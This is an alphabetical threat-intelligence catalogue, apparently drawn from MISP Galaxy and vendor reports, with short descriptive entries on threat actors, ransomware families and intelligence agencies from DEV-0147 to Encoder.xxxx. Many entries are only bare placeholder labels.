DEV-0147 is a China-based cyber espionage actor was observed compromising diplomatic targets in South America, a notable expansion of the group's data exfiltration operations that traditionally targeted gov't agencies and think tanks in Asia and Europe. DEV-0147 is known to use tools like ShadowPad, a remote access trojan associated with other China-based actors, to maintain persistent access, and QuasarLoader, a webpack loader, to deploy additional malware. DEV-0147's attacks in South America included post-exploitation activity involving the abuse of on-premises identity infrastructure for recon and lateral movement, and the use of Cobalt Strike for command and control and data exfiltration.
DEV-0270
Microsoft threat intelligence teams have been tracking multiple ransomware campaigns and have tied these attacks to DEV-0270, also known as Nemesis Kitten, a sub-group of Iranian actor PHOSPHORUS. Microsoft assesses with moderate confidence that DEV-0270 conducts malicious network operations, including widespread vulnerability scanning, on behalf of the government of Iran.
DEV-0569
DEV-0569, also known as Storm-0569, is a threat actor group that has been observed deploying the Royal ransomware. They utilize malicious ads and phishing techniques to distribute malware and gain initial access to networks. The group has been linked to the distribution of payloads such as Batloader and has forged relationships with other threat actors. DEV-0569 has targeted various sectors, including healthcare, communications, manufacturing, and education in the United States and Brazil.
DEV-0586
MSTIC has not found any notable associations between this observed activity, tracked as DEV-0586, and other known activity groups. MSTIC assesses that the malware (WhisperGate), which is designed to look like ransomware but lacking a ransom recovery mechanism, is intended to be destructive and designed to render targeted devices inoperable rather than to obtain a ransom.
DEV-0928
DEV-0928 is a threat actor that has been tracked by Microsoft since September 2022. They are known for their involvement in high-volume phishing campaigns, using tools offered by DEV-1101. DEV-0928 sends phishing emails to targets and has been observed launching campaigns involving millions of emails. They also utilize evasion techniques, such as redirection to benign pages, to avoid detection.
DEV-0950
Lace Tempest, also known as DEV-0950, is a threat actor that exploited vulnerabilities in software such as SysAid and PaperCut to gain unauthorized access to systems. Lace Tempest is known for deploying the Clop ransomware and exfiltrating data from compromised networks.
DEV-1028
Microsoft reported on MCCrash, an IoT botnet operated by the DEV-1028 threat actor and used to launch DDoS attacks against private Minecraft servers.
Devman Ransomware Group
Devman is a ransomware operation that has reportedly developed its own custom encryptor software, while also reportedly collaborating with other ransomware groups including Qilin, DragonForce, and RansomHub.[[Cyble Safepay Devman June 3 2025](/references/49840002-47ee-4a77-9ceb-577752798dc0)][[AhnLab Dark Web Trends June 10 2025](/references/de36cb84-6eaf-4a67-b09b-b876af38ccb5)]
Devman
DevMan is a ransomware variant first observed in April 2025. It is a customized derivative of the DragonForce family, leveraging attacker-operated infrastructure for double-extortion, where both data theft and encryption are employed to pressure victims. The threat is highly organized, targeting sectors such as technology, construction, public services, healthcare, and consumer services across Asia, Africa, and Europe.
devman2
DevMan 2.0 is the evolved iteration of the DevMan ransomware, first documented in July 2025. It enhances the capabilities of its predecessor with robust double-extortion tactics and operates under a Ransomware-as-a-Service (RaaS) model, offering structured leak and extortion infrastructure. Affiliates and operators are using it across diverse sectors—such as manufacturing, retail, and electronics—targeting organizations in Japan, Germany, and other countries. Demands from initial campaigns range widely, spanning from around $1 million to over $10 million USD.
Devos
ransomware
DEXTOROUS SPIDER
DEXTOROUS SPIDER is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Dharma Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. CrySiS > Dharma Note: ATTENTION! At the moment, your system is not protected. We can fix it and restore files. To restore the system write to this address: bitcoin143@india.com. CrySiS variant
dharma
Dharma is a prolific ransomware family active since at least 2016, evolving from the earlier CrySiS ransomware. It operates under a Ransomware-as-a-Service (RaaS) model, allowing affiliates to deploy customized builds with their own contact emails and extensions. Dharma typically appends encrypted files with patterns like .id-[victimID].[email].dharma or other campaign-specific suffixes. Initial access is often gained through exposed Remote Desktop Protocol (RDP) services secured with weak or stolen credentials, sometimes combined with brute-force attacks. The malware encrypts files using AES with RSA to secure the keys and drops ransom notes in text files and pop-up windows. Numerous variants have emerged over time, each linked to different affiliates, making attribution difficult.
DHS Office of Intelligence and Analysis
DHS Office of Intelligence and Analysis (I&A)
Diamond
Ransomware
Diavol
A ransomware with potential ties to Wizard Spider.
DiceyF
DiceyF is an advanced persistent threat group that has been targeting online casinos and other victims in Southeast Asia for an extended period. They have exhibited overlapping activity with LuckyStar PlugX and Earth Berberoka/GamblingPuppet, as reported by various cybersecurity vendors. While their motivations remain unclear, previous incidents suggest a combination of espionage and intellectual property theft rather than immediate financial gain. DiceyF continuously evolves their codebase and adds encryption capabilities to enhance their stealthy cyberespionage activities.
DieNet
DieNet is a hacktivist group that emerged in March 2025, known for conducting DDoS attacks targeting entities associated with political figures, such as Trump businesses. The group has claimed responsibility for disabling ten significant Iraqi websites, framing the action as support for their affiliates in the “Shiite Harvest.” Their operations suggest motivations rooted in sectarian dynamics, with a coordinated effort indicated by the use of hashtags like #DieNet and #Shiite_Harvest. This reflects the use of cyber offensives as tools for political and ideological expression, mirroring offline sectarian tensions.
Digisom
Ransomware
Digital Security Agency
Digital Security Agency
DilmaLocker
Ransomware
Direcția Generală de Informații a Apărării
General Directorate for Defense Intelligence (DGIA) – Direcția Generală de Informații a Apărării
Direcția Generală de Informații și Protecție Internă
General Directorate for Internal Security (DGPI) – Direcția Generală de Protecție Internă
Dirección de Contra-Inteligencia Militar
Military Counterintelligence Directorate
Dirección de Observaciones Judiciales
Directorate of Judicial Surveillance (DOJ) – Dirección de Observaciones Judiciales
Dirección General de Contrainteligencia Militar
Directorate General of Military Intelligence – Dirección General de Contrainteligencia Militar (DGCIM)
Dirección Nacional de Inteligencia Criminal
National Directorate of Criminal Intelligence (DNIC) – Dirección Nacional de Inteligencia Criminal
Dirección Nacional de Inteligencia Estratégica Militar
National Directorate of Strategic Military Intelligence (DNIEM) – Dirección Nacional de Inteligencia Estratégica Militar
Direction du renseignement militaire
Directorate of Military Intelligence (DRM; Direction du renseignement militaire) – Military intelligence.
Direction Generale pour l'Etude et la Documentation
Directorate of Research and Documentation - Direction Generale pour l'Etude et la Documentation (DGED)
Direction Nationale du Renseignement et des Enquêtes Douanières
Direction Nationale du Renseignement et des Enquêtes Douanières (DNRED)
direction nationale du renseignement territorial (DNRT)
direction nationale du renseignement territorial (DNRT)
Director of National Intelligence
Office of the Director of National Intelligence (ODNI)
Directorate-General for External Security
Directorate-General for External Security (DGSE; Direction générale de la sécurité extérieure) – Foreign intelligence relating to national security.
Directorate General of Customs and Excise (Indonesia)
Customs & Excise Sub-Directorate of Intelligence – Sub-Direktorat Intelijen Direktorat Jenderal Bea Cukai
Directorate General of Forces Intelligence
Directorate General of Forces Intelligence (DGFI)
Directorate General of GST Intelligence
Directorate General of GST Intelligence (DGGI)[11]
Directorate General of Immigration (Indonesia)
Directorate of Immigration Intelligence – Direktorat Intelijen Imigrasi
Directorate General of Intelligence and Investigation
Directorate-General of Intelligence and Investigation (DGII)
Directorate of Air Intelligence (India)
Directorate of Air Intelligence
Directorate of Air Intelligence
Directorate of Air Intelligence
Directorate of Intelligence and Security
Directorate on Intelligence and Security Services (DISS – Ministry of State President Espionage & Counter Intelligence unit)
Directorate of Intelligence Royal Thai Army (DINTRTA)
Directorate of Intelligence Royal Thai Army (DINTRTA)
Directorate of Intelligence, RTAF (INTELLRTAF)
Directorate of Intelligence, RTAF (INTELLRTAF)
Directorate of Joint Intelligence (DJI)
Directorate of Joint Intelligence (DJI)
Directorate of Military Intelligence (Ireland)
Directorate of Military Intelligence (G2)
Directorate of Military Intelligence, Nepal
Directorate of Military Intelligence (DMI)
Directorate of Military Intelligence (Sri Lanka)
Directorate of Military Intelligence (Sri Lanka)
Directorate of Naval Intelligence (India)
Directorate of Naval Intelligence
Directorate of Revenue Intelligence
Directorate of Revenue Intelligence
Direwolf
Dire Wolf is a recently emerged double-extortion ransomware group that first appeared around May 2025. It is a crypto-ransomware and data broker targeting industries like manufacturing and technology across multiple countries, including the U.S., Thailand, Taiwan, Singapore, Türkiye, among others. Written in Go and delivered as a UPX-packed binary, it utilizes robust encryption (Curve25519 and ChaCha20) to lock files with a .direwolf extension, while deleting backups, disabling logging, and terminating key services to block recovery. Victims receive highly customized ransom notes containing live-chat credentials and victim-specific portals, indicating a highly professional and targeted approach.
DirtyDecrypt
Ransomware
Dishwasher
Ransomware
DiskDoctor
new Scarab Ransomware variant called DiskDoctor that appends the .DiskDoctor extension and drops a ransom note named HOW TO RECOVER ENCRYPTED FILES.TXT
Dispossessor
Dispossessor, active since August 2023, was a data-extortion ransomware-as-a-service group led by the moniker "Brain". The group quickly expanded from U.S.-focused attacks to target small and mid-sized organizations globally—across sectors like healthcare, finance, transportation, education, and manufacturing. Their tactics included exploiting weak passwords and lack of multifactor authentication to gain access, followed by data exfiltration and staged extortion: victims were contacted via email or phone with links to proof-video platforms, and exposed on Tor-based leak sites if no payment was made. Many of the organizations targeted (approximately 43 identified) were across diverse countries including the U.S., Canada, Brazil, India, Germany, and more. By mid-2024, international law enforcement—including the FBI, UK National Crime Agency, and German agencies—successfully dismantled their infrastructure.
District
Ransomware
DIZZY PANDA
DIZZY PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Django
ransomware
DMA Locker 1.0-2.0-3.0
Ransomware
DMA Locker 4.0
Ransomware
DMALocker 3.0
Ransomware
DMALocker Imposter
Ransomware
DMALocker
Ransomware no extension change Encrypted files have prefix: Version 1: ABCXYZ11 - Version 2: !DMALOCK - Version 3: !DMALOCK3.0 - Version 4: !DMALOCK4.0
DN
It’s directed to English speaking users, therefore is able to infect worldwide. Uses the name “Chrome Update” to confuse its victims. Then imitates the chrome update process ,while encrypting the files. DO NOT pay the ransom, since YOUR COMPUTER WILL NOT BE RESTORED FROM THIS MALWARE!!!!
DNRansomware
Ransomware Code to decrypt: 83KYG9NW-3K39V-2T3HJ-93F3Q-GT
DNSpionage
Cisco Talos recently discovered a new campaign targeting Lebanon and the United Arab Emirates (UAE) affecting .gov domains, as well as a private Lebanese airline company. Based on our research, it's clear that this adversary spent time understanding the victims' network infrastructure in order to remain under the radar and act as inconspicuous as possible during their attacks. Based on this actor's infrastructure and TTPs, we haven't been able to connect them with any other campaign or actor that's been observed recently. This particular campaign utilizes two fake, malicious websites containing job postings that are used to compromise targets via malicious Microsoft Office documents with embedded macros. The malware utilized by this actor, which we are calling "DNSpionage," supports HTTP and DNS communication with the attackers. In a separate campaign, the attackers used the same IP to redirect the DNS of legitimate .gov and private company domains. During each DNS compromise, the actor carefully generated Let's Encrypt certificates for the redirected domains. These certificates provide X.509 certificates for TLS free of charge to the user. We don't know at this time if the DNS redirections were successful. In this post, we will break down the attackers' methods and show how they used malicious documents to attempt to trick users into opening malicious websites that are disguised as "help wanted" sites for job seekers. Additionally, we will describe the malicious DNS redirection and the timeline of the events.
Dodger
Ransomware
DogeCrypt
ransomware
DolphinTear
Ransomware
Domestic Kitten
An extensive surveillance operation targets specific groups of individuals with malicious mobile apps that collect sensitive information on the device along with surrounding voice recordings. Researchers with CheckPoint discovered the attack and named it Domestic Kitten. The targets are Kurdish and Turkish natives, and ISIS supporters, all Iranian citizens.
Domino
Ransomware Based on Hidden Tear
Donald Trump 2 Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Here is the original ransomware under this name: http://id-ransomware.blogspot.co.il/2016/09/donald-trump-ransomware.html
Donald Trump
Ransomware
Donation1
Ransomware
Done
Ransomware
donex
The ransomware group known as DoNex was first identified in mid-March 2024. According to the data collected, the samples used by the group were compiled in mid-February, suggesting that it is a relatively new operation.
DoNotChange
Ransomware
Dont_Worry
Ransomware
Donut
S!Ri found a new ransomware called Donut that appends the .donut extension and uses the email donutmmm@tutanota.com.
Donutleaks
TOX: D3404141459BC7206CC4AFEC16A3403F262C0937A732C12644E7CA97F0615201A519F7EAB2E2
DOPPEL SPIDER
In June 2019, CrowdStrike Intelligence observed a source code fork of BitPaymer and began tracking the new ransomware strain as DoppelPaymer. Further technical analysis revealed an increasing divergence between two versions of Dridex, with the new version dubbed DoppelDridex. Based on this evidence, CrowdStrike Intelligence assessed with high confidence that a new group split off from INDRIK SPIDER to form the adversary DOPPEL SPIDER. Following DOPPEL SPIDER’s inception, CrowdStrike Intelligence observed multiple BGH incidents attributed to the group, with the largest known ransomware demand being 250 BTC. Other demands were not nearly as high, suggesting that the group conducts network reconnaissance to determine the value of the victim organization.
DORRA
A new ransomware variant has been identified, named DORRA. It is worth mentioning in advance that this variant is derived from the Makop ransomware family. This variant encrypts data by adding the “.DORRA” extension to files, as well as a unique ID and the ransomware developer's email address. After encrypting the data, the payload creates a ransom note as a text file named “README-WANING.txt,” through which victims are instructed to contact the threat actor via the provided email to decrypt the data. Interestingly, this variant uses a simple email address hosted on Microsoft's Outlook service as the contact method.
DotNoData
Ransomware
DotRansomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
DotZeroCMD
Ransomware
Državna Agencija za Istrage i Zaštitu
Državna Agencija za Istrage i Zaštitu (State Investigation and Protection Agency, SIPA)
Dr. Fucker
Ransomware
Dr. Jimbo
Ransomware
DragonBreath
Golden Eye Dog targets Chinese-speaking users engaged in online gambling, employing techniques such as SERP poisoning, social engineering, and DDoS attacks. The group utilizes trojanized NSIS installers to deliver RONINGLOADER, which executes complex process-injection workflows and deploys a modified Gh0st RAT for espionage. Their operations have included DLL sideloading and the use of watering hole websites to implant Trojans. The group is noted for its high anti-detection capabilities and has been associated with various malware development languages.
Dragonbridge
DRAGONBRIDGE is a Chinese state-sponsored threat actor known for engaging in information operations to promote the political interests of the People's Republic of China. They have been observed using AI-generated images and videos to spread propaganda on social media platforms. The group has targeted various countries and regions, including the US, Taiwan, and Japan, with narratives promoting pro-PRC viewpoints. DRAGONBRIDGE has been linked to campaigns discrediting the US political system, sowing division between allies, and criticizing specific companies and individuals.
Dragoncyber
ransomware
Dragonfly 2.0
Dragonfly 2.0 is a suspected Russian threat group which has been active since at least late 2015. Dragonfly 2.0's initial reported targets were a part of the energy sector, located within the United States, Switzerland, and Turkey. There is debate over the extent of overlap between Dragonfly 2.0 and Dragonfly, but there is sufficient evidence to lead to these being tracked as two separate groups.
DragonForce Ransomware Group
DragonForce operates a Ransomware-as-a-Service (RaaS) affiliate program using two ransomware variants: LockBit 3.0 and a modified ContiV3. The group uses double extortion tactics, encrypting data and threatening to leak it unless paid. Launched in June 2024, the program offers affiliates 80% of ransoms and tools to manage attacks. Affiliates can customize ransomware, disable security, and set encryption parameters. DragonForce employs the BYOVD technique to disable security processes and erases Windows logs to hinder investigations.[[Group-IB DragonForce September 25 2024](/references/28279a56-60e8-4e88-9627-accc969fa48c)]
Dragonforce
DragonForce is a ransomware-as-a-service (RaaS) group first identified in late 2023. Originally linked to hacktivist activity, the group pivoted to financially motivated operations by early 2024. Since then, it has accelerated into a highly organized cartel-like network, providing customizable payloads to affiliates, a sophisticated affiliate portal, and shared infrastructure for leak sites and campaigns. The group has targeted a wide range of sectors globally, including major UK retailers such as M&S, Harrods, and Co-op, along with organizations in government, logistics, and manufacturing. Its operations are known for strategic branding flexibility, enabling affiliates to operate under their own labels using DragonForce’s backend services.
DragonRank
DragonRank is a threat actor primarily targeting web application services in Asia and Europe, utilizing TTPs associated with Simplified Chinese-speaking hacking groups. They exploit vulnerabilities in platforms like phpMyAdmin and WordPress to deploy web shells, enabling the installation of PlugX and BadIIS malware for black hat SEO practices. Their operations involve lateral movement within compromised networks to maintain control and elevate privileges, while also engaging in unethical online marketing strategies. DragonRank's activities include manipulating search engine rankings and distributing scam websites through compromised Windows IIS servers.
DragonSpark
DragonSpark is a threat actor that has been conducting attacks primarily targeting organizations in East Asia. They utilize the open-source tool SparkRAT, which is a multi-platform and frequently updated remote access Trojan. The threat actor is believed to be Chinese-speaking based on their use of Chinese language support and compromised infrastructure located in China and Taiwan. They employ various techniques to evade detection, including Golang source code interpretation and the use of the China Chopper webshell.
Drakos
Ransomware
DriedSister
Ransomware
DriftingCloud
DriftingCloud is a persistent threat actor known for targeting various industries and locations. They are skilled at developing or acquiring zero-day exploits to gain unauthorized access to target networks. Compromising gateway devices is a common tactic used by DriftingCloud, making network monitoring solutions crucial for detecting their attacks.
DRSD
Direction du Renseignement et de la Sécurité de la Défense (DRSD; Direction du Renseignement et de la Sécurité de la Défense) – Foreign intelligence relating to national security.
Drug Intelligence Division (DID)
Drug Intelligence Division (DID)
DualShot
ransomware
DUMB Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
DummyEncrypter Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
DummyLocker
Ransomware
DUNGEON SPIDER
DUNGEON SPIDER is a criminal group operating the ransomware most commonly known as Locky, which has been active since February 2016 and was last observed in late 2017. Locky is a ransomware tool that encrypts files using a combination of cryptographic algorithms: RSA with a key size of 2,048 bits, and AES with a key size of 128 bits. Locky targets a large number of file extensions and is able to encrypt data on shared network drives. In an attempt to further impact victims and prevent file recovery, Locky deletes all of the Shadow Volume Copies on the machine. DUNGEON SPIDER primarily relies on broad spam campaigns with malicious attachments for distribution. Locky is the community/industry name associated with this actor.
dunghill
Dunghill Leak is the publicly branded data leak site (DLS) operated by the Dark Angels ransomware group, established circa January 2023. Rather than a standalone encryption threat, it serves as the disclosure and extortion platform where stolen victim data is published if ransom demands are ignored. Dark Angels is known for highly targeted “big game hunting” tactics, exfiltrating tens to hundreds of terabytes of corporate data, often without encrypting systems. Victims include major industry players—like Johnson Controls, Sabre, Sysco, and a Fortune 50 firm—which reportedly paid a record-breaking $75 million USD ransom. The leak site is complemented by a mirrored Telegram channel for distributing victim announcements and maintaining negotiation traffic.
Dusk
ransomware
Dust Storm
Threat actors behind the Operation Dust Storm have been active since at least 2010, the hackers targeted several organizations in Japan, South Korea, the US, Europe, and other Asian countries.
DustSquad
Prodaft researchers have published a report on Paperbug, a cyber-espionage campaign carried out by suspected Russian-speaking group Nomadic Octopus and which targeted entities in Tajikistan. According to Prodaft, known compromised victims included high-ranking government officials, telcos, and public service infrastructures. Compromised devices also included OT devices, besides your typical computers, servers, and mobile devices. In typical Prodaft fashion, the company also gained access to one of the group's C&C server backend panels.
Dviide
Ransomware
DXXD
Ransomware
DynA-Crypt Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
E Division – Intelligence Division
E Division – Intelligence Division
Earth Alux
Earth Alux is a China-linked APT group known for conducting cyberespionage attacks across various sectors, including government, technology, and telecommunications. They primarily exploit vulnerable services in exposed servers to gain initial access, implanting web shells like GODZILLA and deploying backdoors such as VARGEIT and COBEACON. The group employs tools like RSBINJECT and MASQLOADER for lateral movement and network discovery, while also utilizing RAILSETTER for persistence through mspaint injection. Their operations have predominantly targeted the APAC region and have extended to Latin America, with a focus on exfiltrating sensitive information to attacker-controlled cloud storage.
Earth Baxia
Earth Baxia is a threat actor opearting out of China, targeting government organizations in Taiwan and potentially across the APAC region, using spear-phishing emails and exploiting the GeoServer vulnerability CVE-2024-36401 for remote code execution, deploying customized Cobalt Strike components with altered signatures, leveraging GrimResource and AppDomainManager injection techniques to deliver additional payloads, and utilizing a new backdoor named EAGLEDOOR for multi-protocol communication and payload delivery.
Earth Berberoka
According to TrendMicro, Earth Berberoka is a threat group originating from China that mainly focuses on targeting gambling websites. This group's campaign uses multiple malware families that target the Windows, Linux, and macOS platforms that have been attributed to Chinese-speaking actors. Aside from using tried-and-tested malware families that have been upgraded, such as PlugX and Gh0st RAT, Earth Berberoka has also developed a brand-new complex, multistage malware family, which has been dubbed PuppetLoader.
Earth Estries
Trend Micro found that Earth Estries relies heavily on DLL sideloading to load various tools within its arsenal. Aside from the backdoors previously mentioned, this intrusion set also utilizes commonly used remote control tools like Cobalt Strike, PlugX, or Meterpreter stagers interchangeably in various attack stages. These tools come as encrypted payloads loaded by custom loader DLLs.
Earth Freybug
Earth Freybug, identified as a subset of APT41, is a cyberthreat group active since at least 2012, engaging in espionage and financially motivated activities across various sectors worldwide. The tactics, techniques, and procedures (TTPs) used in this campaign are similar to the ones from a campaign (Operation CuckooBees) described in an article published by Cybereason. They employ a diverse toolkit, including LOLBins and custom malware, to execute sophisticated cyberespionage attacks. The group's recent tactics involve DLL hijacking and API unhooking through a newly discovered malware named UNAPIMON, which prevents child processes from being monitored. This technique was observed in a vmtoolsd.exe process creating remote tasks to deploy malicious batch files for reconnaissance and backdoor access. UNAPIMON's simplicity and use of Microsoft Detours for defense evasion highlight the group's evolving methods and the need for vigilant security measures, such as restricting admin privileges and adhering to the principle of least privilege. Earth Freybug's persistence and creativity in refining their techniques underscore the ongoing threat they pose and the importance of proactive cybersecurity practices.
Earth Kapre
Earth Kapre is an APT group specializing in cyberespionage. They target organizations in various countries through phishing campaigns using malicious attachments to infect machines. Earth Kapre employs techniques like abusing PowerShell, curl, and Program Compatibility Assistant to execute malicious commands and evade detection within targeted networks. The group has been active since at least 2018 and has been linked to multiple incidents involving data theft and espionage.
Earth Kitsune
Earth Kitsune is an advanced persistent threat actor that has been active since at least 2019. They primarily target individuals interested in North Korea and use various tactics, such as compromising websites and employing social engineering, to distribute self-developed backdoors. Earth Kitsune demonstrates technical proficiency and continuously evolves their tools, tactics, and procedures. They have been associated with malware such as WhiskerSpy and SLUB.
Earth Krahang
Earth Krahang is an APT group targeting government organizations worldwide. They use spear-phishing emails, weak internet-facing servers, and custom backdoors like Cobalt Strike, RESHELL, and XDealer to conduct cyber espionage. The group creates VPN servers on infected systems, employs brute force attacks on email accounts, and exploits compromised government infrastructure to attack other governments. Earth Krahang has been linked to another China-linked actor, Earth Lusca, and is believed to be part of a specialized task force for cyber espionage against government institutions.
Earth Kurma
Earth Kurma is an APT group targeting government and telecommunications sectors in Southeast Asia, with a primary focus on data exfiltration. They employ advanced custom malware, including rootkits like KRNRAT and MORIYA, and utilize cloud storage services for exfiltration. Their toolsets include TESDAT and SIMPOBOXSPY, and they demonstrate adaptive TTPs and complex evasion techniques. Attribution overlaps with other APT groups, but distinct attack patterns warrant their separate designation.
Earth Lamia
Earth Lamia is a China-nexus APT that targets organizations across multiple sectors, including finance, logistics, and government, primarily in Latin America, the Middle East, and Southeast Asia. The actor exploits web application vulnerabilities, such as CVE-2025-55182, and employs techniques like SQL injection, DLL sideloading, and the deployment of custom backdoors like PULSEPACK and BypassBoss. Earth Lamia conducts reconnaissance, file operations, and credential theft, often utilizing tools like Cobalt Strike and VShell.
Earth Longzhi
Earth Longzhi is a subgroup of APT41 targeting organizations based in Taiwan, Thailand, the Philippines, and Fiji, and using “stack rumbling” via Image File Execution Options (IFEO), a new denial-of-service (DoS) technique to disable security software.
Earth Naga
Earth Naga is an APT group that has persistently targeted high-value organizations, including government agencies, telecommunications, and military-related manufacturers, primarily in Taiwan and the broader APAC region. They have been linked to the use of Draculoader and ShadowPad C&C infrastructure, demonstrating sophisticated TTPs such as establishing SSH connections through compromised mail servers. Earth Naga has collaborated with Earth Estries, sharing access to facilitate continued exploitation, complicating detection and attribution efforts. Their operations reflect a growing interest in global intelligence collection, extending to NATO member countries and Latin America.
Earth Wendigo
Earth Wendigo is a threat actor from China that has been targeting several organizations — including government organizations, research institutions, and universities in Taiwan — since May 2019, aiming to exfiltrate emails from targeted organizations via the injection of JavaScript backdoors to a webmail system that is widely used in Taiwan. The threat actor also sent spear-phishing emails embedded with malicious links to multiple individuals, including politicians and activists, who support movements in Tibet, the Uyghur region, or Hong Kong.
Earth Yako
Earth Yako is a threat actor that has been actively targeting researchers in academic organizations and think tanks in Japan. They use spearphishing emails with malicious attachments to gain initial access to their targets' systems. Earth Yako's objectives and patterns suggest a possible connection to a Chinese APT group, but conclusive proof of their nationality is lacking. They have been observed using various malware delivery methods and techniques, such as the use of Winword.exe for DLL Hijacking.
eBayWall
Ransomware
EbolaRnsmwr
Ransomware
EC2 Grouper
EC2 Grouper is a prolific threat actor known for leveraging AWS tools for PowerShell to conduct automated attacks in cloud environments. They typically utilize the CreateSecurityGroup API to establish remote access and exhibit a consistent security group naming convention. Credential acquisition is believed to stem from compromised cloud access keys, often sourced from public code repositories. Notably, their activities do not include calls to AuthorizeSecurityGroupIngress, suggesting a selective approach to escalation.
eCh0raix
Anomali researchers have observed a new ransomware family, dubbed eCh0raix, targeting QNAP Network Attached Storage (NAS) devices. QNAP devices are created by the Taiwanese company QNAP Systems, Inc., and contain device storage and media player functionality, amongst others. The devices appear to be compromised by brute forcing weak credentials and exploiting known vulnerabilities in targeted attacks. The malicious payload encrypts the targeted file extensions on the NAS using AES encryption and appends .encrypt extension to the encrypted files. The ransom note created by the ransomware has the form shown below. eCh0raix was first seen in June 2019, after victims began reporting ransomware attacks in a forum topic on BleepingComputer. On June 1st, 2020, there has been a sudden surge of eCh0raix victims seeking help in our forums and submissions to the ransomware identification site ID-Ransomware.
ECLR
Ransomware
Edalat-e Ali
Edalat-e Ali is a hacktivist group known for disrupting Iranian state-run TV and radio transmissions during significant events, such as the Revolution Day ceremonies. They have also targeted government facilities, releasing security camera footage to expose abuses and draw attention to human rights violations. The group has used their hacks to call for protests against the Iranian regime and have displayed anti-government messages during their disruptions. Edalat-e Ali has been active in releasing sensitive information and footage to embarrass Iranian officials and highlight injustices within the country.
EdgeLocker
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 0.1 Bitcoins. Original name is TrojanRansom.
Educated Manticore
Educated Manticore is an Iranian APT group aligned with the Islamic Revolutionary Guard Corps, primarily engaged in espionage targeting government, military, and academic sectors. The group employs spear-phishing tactics, utilizing custom backdoors like POWERLESS and phishing kits designed as SPAs to harvest credentials. Their operations have included impersonating credible figures to lure victims and using ISO images to initiate infection chains. Educated Manticore's activities are characterized by rapid domain setup and aggressive spear-phishing campaigns, particularly against Israeli individuals.
EduCrypt
Ransomware Based on Hidden Tear
EduRansom
ransomware
Egalyty
ransomware
EggLocker
Ransomware
Egregor
The threat group behind this malware seems to operate by hacking into companies, stealing sensitive data, and then running Egregor to encrypt all the files. According to the ransom note, if the ransom is not paid by the company within 3 days, and aside from leaking part of the stolen data, they will distribute via mass media where the company's partners and clients will know that the company was attacked.
Egyptian General Intelligence Directorate
Gihaz al-Mukhabarat al-Amma (GIS) (General Intelligence Service)
Egyptian Homeland security
Al-amn al-Watani (HS) (Homeland Security)
EiTest
Ransomware
Ekati demo tool
Ransomware
el dorado
This group is believed to be connected to Lost Trust. El Dorado rebranded to BlackLock in September 2024.
El Machete
El Machete is one of these threats that was first publicly disclosed and named by Kaspersky here. We’ve found that this group has continued to operate successfully, predominantly in Latin America, since 2014. All attackers simply moved to new C2 infrastructure, based largely around dynamic DNS domains, in addition to making minimal changes to the malware in order to evade signature-based detection.
El-Polocker
Ransomware Has a GUI
Elcometa
Elcometa is an active extortion or ransomware group tracked by RansomLook.
Eldorado Ransomware Operators
This object reflects the ATT&CK Techniques associated with threat actors who deploy Eldorado, a ransomware-as-a-service ("RaaS") first advertised for sale on cybercrime forums in March 2024. Researchers assess that Eldorado is a "unique" ransomware strain that is likely not derived from previously leaked ransomware source code.[[Group-IB July 3 2024](/references/50148a85-314c-4b29-bdfc-913ab647dadf)] Windows and Linux-focused versions of the ransomware are known to exist. (ATT&CK Techniques associated with these malware binaries are tracked in a separate "Eldorado Ransomware" Software object.)
ELECTRIC PANDA
ELECTRIC PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Elonmusknow
Elonmusknow is an active extortion or ransomware group tracked by RansomLook.
ELOQUENT PANDA
ELOQUENT PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
elpaco
Elpaco is a variant of Mimic ransomware that emerged around August 2023. Designed with significant customization and stealth in mind, it targets Windows systems by abusing the Everything search utility to optimize file discovery and accelerate encryption. Operators exploit various initial access methods—most notably RDP brute-force and the Zerologon vulnerability (CVE-2020-1472)—to gain access, escalate privileges, and deliver the payload. The ransomware uses a 7z SFX dropper, deploys multi-threaded encryption, disables recovery options, and self-deletes after execution, leaving victims with encrypted files bearing Elpaco-specific extensions. It's recognized for its adaptability and advanced features compared to earlier Mimic variants.
ELUSIVE COMET
ELUSIVE COMET is a threat actor responsible for significant cryptocurrency theft through sophisticated social engineering attacks, particularly leveraging Zoom's remote control feature. Their attack methodology involves manipulating legitimate workflows and exploiting human-centric vulnerabilities rather than technical flaws. The actor employs tactics such as social proof, time pressure, and interface manipulation to deceive targets. Organizations can mitigate risks by implementing technical controls to disable the remote control feature and deploying email boundary protections like DMARC, SPF, and DKIM.
Embargo
Embargo is a Ransomware-as-a-Service (RaaS) operation first observed in May 2024. It employs a double-extortion model, encrypting victim data while exfiltrating sensitive files for publication on a Tor-based leak site. Embargo uses a Rust-based payload that leverages AES-256 and RSA-4096 encryption, deletes volume shadow copies, and disables recovery features to prevent restoration. Its targeting appears opportunistic but has included sectors such as finance, manufacturing, and professional services across North America, Europe, and Asia. The ransomware’s customization options, negotiation portal, and leak infrastructure suggest a closed affiliate model with a focus on operational security.
Emniyet Genel Müdürlüğü İstihbarat Başkanlığı (page does not exist)
Emniyet Genel Müdürlüğü İstihbarat Başkanlığı (Intelligence Directorate)
Enc1
Ransomware
enciphered
aka xoriste
Encoder.xxxx
Ransomware Coded in GO
